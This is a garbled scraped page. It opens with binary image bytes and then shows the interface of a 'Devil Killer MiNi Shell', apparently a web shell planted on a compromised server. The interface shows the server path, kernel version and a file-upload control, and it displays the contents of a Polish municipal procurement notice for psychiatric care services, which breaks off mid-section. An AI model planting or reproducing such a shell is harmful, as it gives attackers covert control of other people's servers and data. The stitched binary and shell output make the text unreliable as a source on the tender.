JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231122/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231122/0050350801-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi objętych pomocą Miejskiego Ośrodka Pomocy Społecznej w Olsztynie </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Ośrodek Pomocy Społecznej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 004447867</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">al. Marsz. J. Piłsudskiego 61a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Olsztyn</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">10-449</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">warmińsko-mazurskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL622 - Olsztyński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">89 5340414</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">89 5340538</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuro@mopsolsztyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://mopsolsztyn.bip.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> pomoc społeczna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi objętych pomocą Miejskiego Ośrodka Pomocy Społecznej w Olsztynie </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3128e113-885e-11ee-9fb5-3edbb70f45bd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00503508</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00041522/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.4 Świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi w roku 2024</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.olsztyn.eu <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.olsztyn.eu</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.W przedmiotowym postępowaniu<br/>komunikacja pomiędzy Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji elektronicznej za<br/>pośrednictwem Platformy Zamówień Publicznych Gminy Olsztyn dostępnej pod adresem: https://zamowienia.olsztyn.eu<br/>Zamawiający dopuszcza również możliwość porozumiewania się za pomocą e-maila przy przekazywaniu pytań, wniosków o<br/>wyjaśnienie treści SWZ, zawiadomień, informacji dotyczących postępowania, pod adresem i.cymek@mopsolsztyn.pl przy czym<br/>złożenie oferty wraz załączonymi do oferty dokumentami może nastąpić wyłącznie za pośrednictwem Platformy Zamówień<br/>Publicznych Gminy Olsztyn https://zamowienia.olsztyn.eu<br/>2.Korzystanie z Platformy jest bezpłatne, aby korzystać z usług Platformy Zamówień Publicznych Gminy Olsztyn Wykonawca<br/>powinien utworzyć konto użytkownika. Szczegóły zawarte są w Rozdziale XII</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zgodnie z art 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (DZ.U. UE L119 z dnia<br/>4 maja 2016 r., str. 1; zwanym dalej &#34;RODO&#34;) informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest: Miejski Ośrodek Pomocy Społecznej w Olsztynie, al. Marsz. J. Piłsudskiego<br/>61 A, 10-449 Olsztyn posiadający REGON: 004447867, NIP: 7391151579, e-mail: biuro@mopsolsztyn.pl;<br/>2)administrator wyznaczył inspektora danych osobowych, z którym można się kontaktować pod adresem e-mail:<br/>iodo@mopsolsztyn.pl<br/>3)Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym<br/>postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie przetargu nieograniczonego.<br/>4)odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, w którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art 74 ustawy Pzp.<br/>5)Pani/Pan dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>6)obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczący (w przypadku, gdy skorzystanie z tego<br/>prawa wymagałoby po stronie administratora niewspółmierne dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o<br/>udzielenie zamówienia publicznego albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie<br/>może skutkować zmianą w wyniku postępowania o udzielenie zamówienia publicznego ani znaną ani zmianą postanowień umowy w<br/>zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c)na podstawie art 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>zakresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, w których mowa o art. 18 ust.<br/>2RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/ Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9) nie przysługuje Pani/Panu:<br/>a) w związku z artykułem 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych<br/>b) prawo do przeniesienia danych osobowych, o których mowa w artykule 20 RODO;<br/>c)na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO;<br/>10) przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych<br/>osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych lub Stawki 2,00 – 193 Warszawa</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MOPS.DZPiI.261.56.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 1138830,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Przedmiotem zamówienia jest „Świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi objętych pomocą Miejskiego Ośrodka Pomocy Społecznej <br/>w Olsztynie w przewidywanej ilości do 22 330 godzin w dni robocze, świąteczne i wolne od pracy. Ww. usługi są świadczone zgodnie z Ustawą z dnia 12 marca 2004 r. o pomocy społecznej (t.j. Dz. U. z 2023 r., poz. 901 ze zm.) Rozporządzeniem Ministra Polityki Społecznej w sprawie specjalistycznych usług opiekuńczych (Dz.U. 2023, poz.395) oraz ustawy z dnia 19 sierpnia 1994r. o ochronie zdrowia psychicznego (Dz.U. z 2022 r., poz. 2123). <br/>Przy realizacji zadania kadra realizująca usługi opiekuńcze powinna liczyć nie mniej niż <br/>19 osób.<br/>2.Zamawiający informuje, że zgodnie z obowiązującymi przepisami z zakresu pomocy społecznej, pomoc w formie usług opiekuńczych przysługuje:<br/>1)Osobie samotnej, która z powodu wieku, choroby lub innych przyczyn wymaga pomocy innych osób, a jest jej pozbawiona, <br/>Usługi opiekuńcze lub specjalistyczne usługi opiekuńcze mogą być przyznane również osobie, która wymaga pomocy innych osób, a rodzina, a także wspólnie niezamieszkujący małżonek, wstępni, zstępni nie mogą takiej pomocy zapewnić.<br/>3.Zgodnie z ustawą o pomocy społecznej: <br/>specjalistyczne usługi opiekuńcze dla osób z zaburzeniami psychicznymi są to usługi dostosowane do szczególnych potrzeb wynikających z rodzaju schorzenia lub niepełnosprawności, świadczone przez osoby ze specjalistycznym przygotowaniem zawodowym.<br/>Szczegółowy zakres specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi został określony w załączniku nr 1 do umowy.<br/>4.Zamawiający podkreśla, że zarówno przyznawanie bądź odmowa przyznawania usług opiekuńczych, jak również: określanie zakresu usług opiekuńczych dla każdej osoby ubiegającej się o przyznanie tej formy pomocy, określanie wymiaru godzin świadczenia usług opiekuńczych oraz miejsca świadczenia usług opiekuńczych stanowi wyłączną kompetencję Zamawiającego i będzie każdorazowo określane w decyzji administracyjnej, wydawanej na podstawie przepisów o pomocy społecznej. Jednocześnie Zamawiający wymaga, aby usługi były realizowane przez Wykonawców wyłącznie na rzecz osoby wskazanej w decyzji jako osoba, której przyznano usługi opiekuńcze, zgodnie z zakresem, wymiarem godzin i w miejscu określonych w wydanej decyzji na podstawie informacji (wykazu) dla Wykonawcy. Zamawiający każdorazowo przekaże wybranemu Wykonawcy informacje niezbędne do świadczenia usług opiekuńczych.<br/>5.W wyjątkowych przypadkach Zamawiający może zlecić realizację usług opiekuńczych przez Wykonawcę telefonicznie lub za pośrednictwem faksu. Zlecenie usług w tym trybie będzie potwierdzone niezwłocznie w formie pisemnej.<br/>6.Zlecenie realizacji usług opiekuńczych przekazywane Wykonawcy obejmuje: dane osób objętych pomocą (imię i nazwisko), indywidualny zakres usług opiekuńczych dla każdej osoby, indywidualny wymiar godzin świadczenia usług, wysokość odpłatności za świadczoną usługę, terminy świadczenia usług (dzień i godziny) oraz miejsce świadczenia tych usług. <br/>7.W przypadku zgonu, pobytu w placówkach służby zdrowia, rezygnacji osoby objętej usługami, Wykonawca niezwłocznie informuje ośrodek pomocy społecznej w sposób przewidziany umową. <br/>8.W przypadku niemożności świadczenia usług przez daną osobę, wymagane jest zastępstwo. Osoba zastępująca musi posiadać odpowiednie kwalifikacje.<br/>9.W przypadku dysponowania przez osobę realizującą specjalistyczne usługi środkami finansowymi osoby objętej pomocą, Wykonawca jest zobowiązany wprowadzić pisemny Rejestr wydatków, prowadzony przez osobę realizującą usługi, zawierający każdorazowe adnotacje o:<br/>1)otrzymaniu przez osobę realizującą usługi specjalistyczne środków finansowych wraz <br/>z podaniem ich kwoty i daty otrzymania, <br/>2) kwocie wydatkowanych środków finansowych wraz z datą ich wydatkowania, <br/>3)zwrocie osobie objętej pomocą pozostałych po wydatkowaniu środków finansowych wraz <br/>z podaniem ich kwoty i daty zwrotu, przy czym zwrot pozostałych po wydatkowaniu środków finansowych winien nastąpić niezwłocznie po ich wydatkowaniu.<br/>4)akceptację rozliczenia każdej operacji przez osobę objętą pomocą (podpis osoby objętej pomocą).<br/>10.Wykonanie przedmiotu zamówienia może być powierzone podwykonawcom:<br/>1)Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę kluczowych części zamówienia.<br/>2)Zamawiający wymaga, aby w przypadku powierzenia części zamówienia podwykonawcom, Wykonawca wskazał w ofercie, części zamówienia, których wykonanie zamierza powierzyć podwykonawcom oraz podał nazwy tych podwykonawców, jeżeli są już znani.<br/>3)Zamawiający żąda, aby przed przystąpieniem do wykonania zamówienia Wykonawca podał nazwy, dane kontaktowe oraz przedstawicieli, podwykonawców zaangażowanych w realizację zadania, jeżeli są już znani. Wykonawca zawiadamia Zamawiającego o wszelkich zmianach w odniesieniu do informacji, o których mowa w zdaniu pierwszym, w trakcie realizacji zamówienia a także przekazuje wymagane informacje na temat nowych podwykonawców, którym w późniejszym okresie zamierza powierzyć realizację usług. <br/>4)Powierzenie wykonania części zamówienia podwykonawcom nie zwalnia Wykonawcy <br/>z odpowiedzialności za należyte wykonanie zamówienia. <br/>11.Szczegółowy zakres zindywidualizowanych usług opiekuńczych, świadczonych na rzecz osoby, której przyznano tę formę pomocy, jest określony przez Zamawiającego w drodze postępowania administracyjnego i przekazany w ramach zawartej umowy na piśmie wybranemu Wykonawcy. <br/>12.Zamawiający wymaga, aby usługi opiekuńcze były wykonywane w dni powszednie, świąteczne i wolne od pracy. Wskazane usługi na rzecz osoby objętej pomocą winny być świadczone w różnym wymiarze godzin świadczenia usług, w razie potrzeb w godzinach <br/>7.00-20.00 zgodnie z wydaną decyzją administracyjną i sporządzoną na jej podstawie informacją dla Wykonawcy. Zamawiający zaznacza, że pod pojęciem wymiaru godzin świadczenia usług należy rozumieć wyłącznie rzeczywisty czas świadczenia usług bez czynności przygotowawczych np. dojazdów do osób objętych tą formą pomocy oraz bez związku z ewentualnymi uprawnieniami pracowników Wykonawcy z tytułu kodeksu pracy (urlopy wypoczynkowe, zwolnienia lekarskie itp.)<br/>13.Osoby świadczące usługi będą zobowiązane do:<br/>1)utrzymywania stałego kontaktu z koordynatorem usług Zamawiającego oraz współpracy <br/>z lekarzem i pielęgniarką środowiskową,<br/>2)współpracy z pracownikiem socjalnym MOPS tj. przekazywania, w sytuacjach tego wymagających, na bieżąco informacji dotyczących funkcjonowania osoby, której świadczone są usługi,<br/>3)legitymowania się dokumentem ze zdjęciem, nazwiskiem oraz nazwą i telefonem Wykonawcy oraz do przestrzegania następujących zasad:<br/>-zachowania tajemnicy służbowej w zakresie wszystkich informacji jakie uzyskają w trakcie pełnienia obowiązków, a w szczególności nie ujawniania osobom trzecim danych osobowych osób, dla których świadczone są usługi, ich sytuacji osobistej, rodzinnej, zdrowotnej i ekonomicznej,<br/>-nie wprowadzania do mieszkania świadczeniobiorcy osób nieupoważnionych oraz własnych zwierząt domowych,<br/>-w czasie świadczenia usług w mieszkaniu świadczeniobiorcy nie będą palić tytoniu, używać narkotyków ani spożywać alkoholu,<br/>-nie obarczać własnymi problemami osób objętych usługami,<br/>-w kontakcie z osobą, której świadczone są usługi będą stosować zwroty grzecznościowe oraz wykonywać usługi z poszanowaniem godności i uczuć tej osoby, z zachowaniem ogólnie przyjętych norm społecznych.<br/>14.Zamawiający wymaga aby koordynator usług, kontrolował i nadzorował proces realizacji specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi na terenie Olsztyna, osoba niekarana. Zamawiający wymaga aby zaproponowana przez Wykonawcę osoba świadczyła faktycznie pracę na terenie miasta Olsztyna, z którą Zamawiający będzie miał kontakt telefoniczny i osobisty przez okres realizacji umowy. Do zadań koordynatora będzie należało: wprowadzanie opiekunek do pracy oraz bieżący nadzór nad objętymi środowiskami. <br/>Wymagania stawiane Wykonawcy: <br/>1)Zamawiający informuje, że w zakresie realizacji zamówienia występują czynności, których wykonanie polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. – Kodeks pracy (t.j. Dz. U. z 2023 r., poz. 1465) tj. w zakresie świadczenia specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi objętych pomocą Miejskiego Ośrodka Pomocy Społecznej w Olsztynie dotyczy opiekunek <br/>i osoby koordynatora usług.<br/>2)Wykonawca/podwykonawca przez cały okres wykonywania przedmiotu umowy zobowiązany jest zatrudniać na podstawie umowy o pracę co najmniej 5 osób-opiekunek<br/>w wymiarze co najmniej ¼ etatu oraz 1 osoby koordynatora usług w wymiarze co najmniej ¼ etatu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85000000-9 - Usługi w zakresie zdrowia i opieki społecznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">85311200-4 - Usługi opieki społecznej dla osób niepełnosprawnych</p> <p class="mb-0">85312000-9 - Usługi opieki społecznej nieobejmujące miejsc noclegowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1.Zamawiający przewiduje udzielenie zamówienia w ramach prawa opcji, o którym mowa w art. 441 ust. 1 ustawy PZP.<br/>2.Przedmiot zamówienia obejmuje:<br/>- zamówienie podstawowe<br/>- zamówienie z opcją rozszerzenia zamówienia w stosunku do zamówienia podstawowego.<br/>3.Przedmiotem zamówienia podstawowego jest świadczenie specjalistycznych usług opiekuńczych dla osób z zaburzeniami psychicznymi objętych pomocą Miejskiego Ośrodka Pomocy Społecznej w Olsztynie.<br/>4.Zamawiający przewiduje możliwość skorzystania z opcji określonych w art. 441 ustawy Prawo zamówień publicznych, które będzie polegało na zwiększeniu ilości godzin usług opiekuńczych w wysokości 40 % wskazanych w zamówieniu podstawowym w razie osiągnięcia limitu godzin usług opiekuńczych przed upływem terminu na jaki została zawarta umowa. Podana w SWZ przewidywana liczba godzin jest liczbą szacunkową. Rzeczywista liczba godzin zleconych do realizacji zależna będzie od faktycznego zapotrzebowania na tę formę pomocy. <br/>5.W ramach przedmiotu zamówienia Zamawiający uprawniony jest do skorzystania z prawa opcji na zasadach i w trybie opisanym poniżej:<br/>a)Zamawiający dopuszcza możliwość skorzystania z prawa opcji do dnia 15.12.2024 r. po wcześniejszym zrealizowaniu zamówienia podstawowego. <br/>b)Zamówienie realizowane w ramach opcji jest jednostronnym uprawnieniem Zamawiającego i nie ma charakteru zobowiązania, dlatego też nieskorzystanie przez Zamawiającego z prawa<br/>opcji nie stanowi podstawy dla Wykonawcy do dochodzenia jakichkolwiek roszczeń w stosunku do Zamawiającego,<br/>c)zamówienie objęte prawem opcji Wykonawca będzie zobowiązany wykonać po uprzednim otrzymaniu pisemnego zawiadomienia od Zamawiającego, że zamierza skorzystać z prawa opcji<br/>d)termin wykonania zamówienia objętego prawem opcji, taki sam jak obowiązujący przy realizacji zamówienia podstawowego <br/>e)zasady dotyczące realizacji zamówienia objętego prawem opcji będą takie same jak te, które obowiązywać będą przy realizacji zamówienia podstawowego. <br/>f)Zamawiający z prawa opcji może skorzystać kilkukrotnie w okresie wskazanym w ust. 5 pkt. a)<br/>6.Wykonawca dołoży należytej staranność przy realizacji zamówienia, usługę wykona w oparciu o obowiązujące przepisy prawa oraz zgodnie z wymaganiami określonymi <br/>w projektowanych postanowieniach umownych, które stanowią załącznik nr 11 do SWZ. <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny 